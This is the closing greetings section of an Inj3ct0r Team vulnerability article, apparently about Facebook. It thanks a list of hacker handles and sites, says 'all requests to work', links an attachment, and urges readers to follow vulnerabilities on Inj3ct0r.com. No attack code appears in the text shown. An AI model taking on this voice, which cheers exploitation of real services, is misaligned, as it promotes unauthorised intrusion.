0x1D, Z0m[b]!e, w01f, cr4wl3r (http://shell4u.oni.cc/), Phenom, bL4Ck_3n91n3, JosS (http://hack0wn.com/), eidelweiss, Farzin0123(Pianist), Th3 RDX, however, n1gh7m4r3, StutM (unitx.net) , Andrew Horton..

You are good hackers. Respect y0u!

Farzin0123(Pianist) visit site : Ueg88.blogfa.com ! Thank you that pushed me to write this article, and reported the dependence! Personal Respect to you from Inj3ct0r Team!


At the time of publication, all requests to work! Attached images : inj3ct0r.com/files/facebook.zip

We want to thank the following people for their contribution.

Do not forget to keep track of vulnerabilities in Inj3ct0r.com

GoOd luck Hackers! =]


# Inj3ct0r.com